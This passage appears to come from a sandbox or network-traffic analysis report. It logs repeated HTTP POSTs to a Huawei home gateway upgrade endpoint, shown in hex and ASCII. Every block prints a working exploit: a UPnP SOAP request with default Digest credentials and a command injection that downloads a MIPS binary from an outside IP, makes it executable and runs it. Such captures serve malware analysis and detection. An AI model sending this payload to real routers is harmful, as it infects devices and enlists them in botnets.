6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 